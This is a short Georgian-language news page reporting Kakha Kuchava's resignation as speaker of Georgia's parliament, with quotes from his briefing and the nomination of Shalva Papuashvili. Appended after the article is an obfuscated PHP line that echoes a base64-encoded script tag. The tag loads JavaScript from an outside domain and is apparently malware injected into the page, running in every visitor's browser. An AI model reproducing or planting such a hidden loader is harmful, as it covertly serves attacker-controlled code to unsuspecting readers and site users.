celsiusi
ავერსი საქკაბელი
საქართველოს პარლამენტის თავმჯდომარე კახა კუჭავამ თანამდებობა დატოვა. ამის შესახებ მან „ქართული ოცნების“ ოფისში გამართულ ბრიფინგზე განაცხადა.
 
როგორც ცნობილი ხდება, „ოცნება“ პარლამენტის თავმჯდომარის პოსტზე შალვა პაპუაშვილს წარადგენს.
 
„მე მივიღე გადაწყვეტილება, რომ დავტოვო სპიკერის თანამდებობა. რა თქმა უნდა, ეს არაა 1-2 დღის გადაწყვეტილება. დაახლოებით, ერთი თვეა, რაც ჩემს გუნდთან ამ საკითხზე მქონდა საუბარი. მე შორს არსად არ მივდივარ. ვრჩები პოლიტსაბჭოში...
 
შემდეგ წელს გაიგებთ უფრო მეტს იმ პროექტზე, რომელსაც მე ვუხელმძღვანელებ და ეს ახსნის ყველა იმ მიზეზს, რატომაც მივიღე ეს გადაწყვეტილება“, - თქვა კახა კუჭავამ.
 
მისი თქმით, ის ცდილობდა, ამ დროის განმავლობაში "ყველას თავმჯდომარე" ყოფილიყო. "ვთვლი, რომ დიდწილად შევძელი ამის გაკეთება", - დასძინა მან. 
915
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");